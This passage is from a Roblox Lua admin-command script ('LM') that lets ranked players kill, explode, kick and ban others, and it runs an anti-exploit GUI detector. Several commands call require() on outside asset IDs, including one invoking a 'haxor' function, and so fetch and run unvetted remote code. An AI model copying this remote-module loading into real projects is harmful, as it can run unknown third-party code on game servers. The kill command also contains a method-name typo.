  888. elseif msg:sub(1,6) == "clean"..bet and checkRank(plr,1) == true then
  889. local s = Instance.new("Sound")
  890.  
  891. s.Name = "Sound"
  892. s.SoundId = "http://www.roblox.com/asset/?id=278467908"
  893. s.Volume = 10
  894. s.Looped = false
  895. s.archivable = false
  896.  
  897. s.Parent = game.Workspace
  898. Output(plr,"LM | The game has been cleaned.","Really black",function() s:play() end)
  899. for i,v in pairs(workspace:GetChildren()) do
  900. if v:IsA("Part") then
  901. if v.Name=="Base" or v.Name=="Baseplate" then
  902. else
  903. v:Destroy()
  904. end
  905. end
  906. end
  907. elseif msg:sub(1,3) == "op"..bet then
  908. if checkRank(plr,9) == true then
  909. require(2832829587)
  910. end
  911. end
  912. elseif msg:sub(1,5) == "unff"..bet then
  913. if checkRank(plr,2) == true then
  914. local s = Instance.new("Sound")
  915.  
  916. s.Name = "Sound"
  917. s.SoundId = "http://www.roblox.com/asset/?id=278467908"
  918. s.Volume = 10
  919. s.Looped = false
  920. s.archivable = false
  921.  
  922. s.Parent = game.Workspace
  923. local victim = (msg:sub(6))
  924. for Index,Player in pairs(Players:GetPlayers()) do
  925. if Player.Name:lower():match(victim:lower()) then
  926. pcall(function()
  927. for i,v in pairs(Player.Character:GetChildren()) do
  928. if v:IsA("ForceField") then
  929. v:Destroy()
  930. Output(plr,"Removed forcefield(s) for "..Player.Name,"Really black",function() s:play() end)
  931. end
  932. end
  933. end)
  934. end
  935. end
  936. end
  937. elseif msg:sub(1,3) == "ex"..bet then
  938. if checkRank(plr,3) == true then
  939. local s = Instance.new("Sound")
  940.  
  941. s.Name = "Sound"
  942. s.SoundId = "http://www.roblox.com/asset/?id=278467908"
  943. s.Volume = 10
  944. s.Looped = false
  945. s.archivable = false
  946.  
  947. s.Parent = game.Workspace
  948. local victim = (msg:sub(4))
  949. for Index,Player in pairs(Players:GetPlayers()) do
  950. if Player.Name:lower():match(victim:lower()) then
  951. if getRank(plr) > getRank(Player) then
  952. pcall(function()
  953. local boom=Instance.new("Explosion",Player.Character.Torso)
  954. boom.Position=Player.Character.Torso.Position
  955. Player.Character:BreakJoints()
  956. end)
  957. else
  958. Output(plr,"LM | "..Player.Name.."'s rank is too high for you to explode him.","Deep orange",function() s:play() end)
  959. end
  960. end
  961. end
  962. else
  963. Output(plr,"LM | Your rank ins't enough for this command[3]","Deep orange",function() s:play() end)
  964. end
  965. elseif msg:sub(1,5) == "kick"..bet then
  966. if checkRank(plr,5) == true then
  967. local s = Instance.new("Sound")
  968.  
  969. s.Name = "Sound"
  970. s.SoundId = "http://www.roblox.com/asset/?id=278467908"
  971. s.Volume = 10
  972. s.Looped = false
  973. s.archivable = false
  974.  
  975. s.Parent = game.Workspace
  976. local victim=(msg:sub(6))
  977. local reason=msg:sub(string.len(victim)+1)
  978. for Index,Player in pairs(Players:GetPlayers()) do
  979. if Player.Name:lower():match(victim:lower()) then
  980. if getRank(plr) > getRank(Player) then
  981. Player:Kick(name.." | You've been kicked by LM! "..reason)
  982. Output(plr,"Player "..Player.Name.." Has been kicked.","Really black",function() s:play() end)
  983. else
  984. Output(plr,"LM | "..Player.Name.."'s rank is too high for you to kick him! ["..getRank(Player).."]","Deep orange",function() s:play() end)
  985. end
  986. end
  987. end
  988. else
  989. Output(plr,"LM | Your rank is too low for this command[3]","Deep orange",function() s:play() end)
  990. end
  991. elseif msg:sub(1,4) == "ban"..bet then
  992. if checkRank(plr,8) == true then
  993. local s = Instance.new("Sound")
  994.  
  995. s.Name = "Sound"
  996. s.SoundId = "http://www.roblox.com/asset/?id=278467908"
  997. s.Volume = 10
  998. s.Looped = false
  999. s.archivable = false
  1000.  
  1001. s.Parent = game.Workspace
  1002. local victim=msg:sub(5)
  1003. local reason=msg:sub(6+string.len(victim)+1)
  1004. for Index,Player in pairs(Players:GetPlayers()) do
  1005. if Player.Name:lower():match(victim:lower()) then
  1006. pcall(function()
  1007. if getRank(Player) < getRank(plr) then
  1008. Ban(Player,reason)
  1009. Output(plr,"LM | You banned "..Player.Name,"Really black",function() s:play() end)
  1010. else
  1011. Output(plr,"LM | "..Player.Name.."'s rank is too high for you to ban him! ["..getRank(Player).."]","Deep orange",function() s:play() end)
  1012. end
  1013. end)
  1014. end
  1015. end
  1016. else
  1017. Output(plr,"LM | Your rank is too low for this command[5]","Deep orange",function() s:play() end)
  1018. end
  1019. elseif msg:sub(1,3) == "ff"..bet then
  1020. if checkRank(plr,2) == true then
  1021. local s = Instance.new("Sound")
  1022.  
  1023. s.Name = "Sound"
  1024. s.SoundId = "http://www.roblox.com/asset/?id=278467908"
  1025. s.Volume = 10
  1026. s.Looped = false
  1027. s.archivable = false
  1028.  
  1029. s.Parent = game.Workspace
  1030. local victim=msg:sub(4)
  1031. for Index,Player in pairs(Players:GetPlayers()) do
  1032. if Player.Name:lower():match(victim:lower()) then
  1033. pcall(function()
  1034. local ff=Instance.new("ForceField",Player.Character)
  1035. Output(plr,"LM | You gave FF to "..Player.Name,"Really black",function() s:play() end)
  1036. end)
  1037. end
  1038. end
  1039. else
  1040. Output(plr,"LM | Your rank is too low for this command[2]","Deep orange",function() s:play() end)
  1041. end
  1042. elseif msg:sub(1,5)=="kill"..bet then
  1043. if checkRank(plr,2) == true then
  1044. local s = Instance.new("Sound")
  1045.  
  1046. s.Name = "Sound"
  1047. s.SoundId = "http://www.roblox.com/asset/?id=278467908"
  1048. s.Volume = 10
  1049. s.Looped = false
  1050. s.archivable = false
  1051.  
  1052. s.Parent = game.Workspace
  1053. local victim=msg:sub(6)
  1054. for Index,Player in pairs(Players:GetPlayers()) do
  1055. if Player.Name:lower():match(victim:lower()) then
  1056. pcall(function()
  1057. if Player:FindFirstChild("Character") then
  1058. if getRank(plr) > getRank(Player) then
  1059. Player.Character:BreakJoins()
  1060. Output(plr,"LM | You killed "..Player.Name,"Deep orange",function() s:play() end)
  1061. else
  1062. Output(plr,"LM | "..Player.Name.."'s rank is too high for you to kill him!["..getRank(Player).."]","Deep orange",function() s:play() end)
  1063. end
  1064. end
  1065. end)
  1066. end
  1067. end
  1068. end
  1069.  
  1070.  
  1071.  
  1072. elseif msg:sub(1,4) == "ar"..bet then
  1073. if checkRank(plr,2) == true then
  1074. if checkRank(plr,ar) == true then
  1075. Output(plr,"LM | Set AR to 1","Really black",function() if checkRank(plr,1) == true then dismiss(plr) ar=1 else dismiss(plr) Output(plr,"LM | Your rank ins't enough for this command[1]","Really red") end end)
  1076. Output(plr,"LM | Set AR to 2","Really black",function() if checkRank(plr,2) == true then dismiss(plr) ar=2 else dismiss(plr) Output(plr,"LM | Your rank ins't enough for this command[2]","Really red") end end)
  1077. Output(plr,"LM | Set AR to 3","Really black",function() if checkRank(plr,3) == true then dismiss(plr) ar=3 else dismiss(plr) Output(plr,"LM | Your rank ins't enough for this command[3]","Really red") end end)
  1078. Output(plr,"LM | Set AR to 4","Really black",function() if checkRank(plr,4) == true then dismiss(plr) ar=4 else dismiss(plr) Output(plr,"LM | Your rank ins't enough for this command[4]","Really red") end end)
  1079. Output(plr,"LM | Set AR to 5","Really black",function() if checkRank(plr,5) == true then dismiss(plr) ar=5 else dismiss(plr) Output(plr,"LM | Your rank ins't enough for this command[5]","Really red") end end)
  1080. Output(plr,"LM | Set AR to 6","Really black",function() if checkRank(plr,6) == true then dismiss(plr) ar=6 else dismiss(plr) Output(plr,"LM | Your rank ins't enough for this command[6]","Really red") end end)
  1081. Output(plr,"LM | Set AR to 7","Really black",function() if checkRank(plr,7) == true then dismiss(plr) ar=7 else dismiss(plr) Output(plr,"LM | Your rank ins't enough for this command[7]","Really red") end end)
  1082. Output(plr,"LM | Set AR to 8","Really black",function() if checkRank(plr,8) == true then dismiss(plr) ar=8 else dismiss(plr) Output(plr,"LM | Your rank ins't enough for this command[8]","Really red") end end)
  1083. Output(plr,"LM | Set AR to 9","Really black",function() if checkRank(plr,9) == true then dismiss(plr) ar=9 else dismiss(plr) Output(plr,"LM | Your rank ins't enough for this command[9]","Really red") end end)
  1084. Output(plr,"LM | Set AR to 10","Really black",function() if checkRank(plr,10) == true then ar=10 else Output(plr,"TM | Your rank ins't enough for this command[10]","Really red") end end)
  1085. else
  1086. Output(plr,"LM | Your rank ins't enough for this command ["..ar.."]","Really red")
  1087. end
  1088. else
  1089. Output(plr,"LM | Your rank ins't enough for this command [2]","Really red")
  1090. end
  1091. elseif msg:sub(1,3) == "rl"..bet then
  1092. if checkRank(plr,2) == true then
  1093. if checkRank(plr,ar) == true then
  1094. local s = Instance.new("Sound")
  1095.  
  1096. s.Name = "Sound"
  1097. s.SoundId = "http://www.roblox.com/asset/?id=278467908"
  1098. s.Volume = 10
  1099. s.Looped = false
  1100. s.archivable = false
  1101.  
  1102. s.Parent = game.Workspace
  1103. Output(plr,"LM | IDKRE","Really black",function() require(992103297) s:play() end)
  1104. Output(plr,"LM | Expine","Really black",function() require(822911087) s:play() end)
  1105. Output(plr,"LM | Unique Tabs","Really black",function() require(2540541496).haxor() s:play() end)
  1106. else
  1107. Output(plr,"LM | Your rank ins't enough for this command ["..ar.."]","Deep orange",function() s:play() end)
  1108. end
  1109. else
  1110. Output(plr,"LM | Your rank ins't enough for this command [2]","Deep orange",function() s:play() end)
  1111. end
  1112. end
  1113. end
  1114.  
  1115. for i,v in pairs(Players:GetPlayers()) do
  1116. if Admins[v.Name] == nil then
  1117. newAdmin(v.Name,1)
  1118. end
  1119. o1 = Instance.new("ScreenGui")
  1120. o2 = Instance.new("ImageLabel")
  1121. o1.Parent = v.PlayerGui
  1122. o2.Name = "logo"
  1123. o2.Parent = o1
  1124. o2.Position = UDim2.new(0.89999997615814,0,0.89999997615814,0)
  1125. o2.Size = UDim2.new(0,100,0,100)
  1126. o2.Position = UDim2.new(0.89999997615814,0,0.89999997615814,0)
  1127. o2.BackgroundColor3 = Color3.new(1, 1, 1)
  1128. o2.BackgroundTransparency = 1
  1129. o2.BorderSizePixel = 0
  1130. o2.Image = "rbxassetid://2886953514"
  1131. Output(v,"LM | "..name.." Has successfully loaded!","Really black")
  1132. Output(v,"LM | You are at "..gamename,"Really black")
  1133. Output(v,"LM | Current version: "..version.."","Really black")
  1134. Output(v,"LM | Please do not abuse.","Really black")
  1135. Output(v,"LM | Click here to view commands.","Really black",function() dismiss(v) showCmds(v) end)
  1136. Output(v,"LM | The current bet is "..bet,"Really black")
  1137. Output(v,"LM | Dismiss","Deep orange",function() dismiss(v)end)
  1138. v.Chatted:connect(function(msg2)
  1139. commands(v,msg2)
  1140. end)
  1141. end
  1142.  
  1143. Players.PlayerAdded:connect(function(v)
  1144. if Admins[v.Name] == nil then
  1145. newAdmin(v.Name,1)
  1146. end
  1147.  
  1148. if PS == true then
  1149. if getRank(v) < ar then
  1150. if center[v] == nil then
  1151. v:Kick(name.." | This server is private.You need a minimum rank of "..ar.." to enter.")
  1152. end
  1153. end
  1154. end
  1155. wait(0.1)
  1156. local s = Instance.new("Sound")
  1157.  
  1158. s.Name = "Sound"
  1159. s.SoundId = "http://www.roblox.com/asset/?id=278467908"
  1160. s.Volume = 10
  1161. s.Looped = false
  1162. s.archivable = false
  1163.  
  1164. s.Parent = game.Workspace
  1165. Output(v,"LM | "..name.." is currently running on this server!","Really black",function() s:play() end)
  1166. Output(v,"LM | You are at "..gamename,"Really black",function() s:play() end)
  1167. Output(v,"LM | Current version: "..version.."","Really black",function() s:play() end)
  1168. Output(v,"LM | Please do not abuse.","Really black",function() s:play() end)
  1169. Output(v,"LM | Click here to view commands.","Really black",function() dismiss(v) showCmds(v) s:play() end)
  1170. Output(v,"LM | The current bet is "..bet,"Really black",function() s:play() end)
  1171. Output(v,"LM | Dismiss","Deep orange",function() dismiss(v) s:play() end)
  1172. v.Chatted:connect(function(msg2)
  1173. commands(v,msg2)
  1174. end)
  1175. end)
  1176.  
  1177. Players.PlayerRemoving:connect(function(v)
  1178. dismiss(v)
  1179. table.insert(lplayers,v.Name)
  1180. if checkAB(v) == true then
  1181. shutdown(getRank(v),name.." | An antiban player has been banned!")
  1182. end
  1183. end)
  1184.  
  1185. -----anti fm----------
  1186.  
  1187. coroutine.wrap(function()
  1188. while wait() do
  1189. for i,v in pairs(Players:GetPlayers()) do
  1190. pcall(function()
  1191. local e=v.PlayerGui
  1192.  
  1193. if v.PlayerGui:FindFirstChild("RX6") then
  1194. say(name," Player"..v.Name.." Has been banned for running ro exploit.")
  1195. Ban(v,"Ro exploit is not allowed. Limit Managements(LM) protection.")
  1196. end
  1197.  
  1198. for a,b in pairs(e:GetChildren()) do
  1199. if b:IsA("Frame") and b.Name == "" then
  1200. say(name,"Player "..v.Name.." Has been kicked for running aerx.")
  1201. v:Kick(name.." | Aerx is not allowed. Limit Managements(LM) protection.")
  1202. end
  1203. end
  1204.  
  1205. if e:FindFirstChild("Bumf") or e:FindFirstChild("TTs") or e:FindFirstChild("AdministratorGUI") then
  1206. say(name,"Player "..v.Name.." Has been kicked for running sex gui.")
  1207. v:Kick(name.." | Sex gui is not allowed. Limit Managements(LM) protection.")
  1208. end
  1209.  
  1210. end)
  1211. end
  1212. end
  1213. end)()
  1214.  
  1215. game:GetService("RunService").Heartbeat:connect(Rot)
  1216. return 0
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement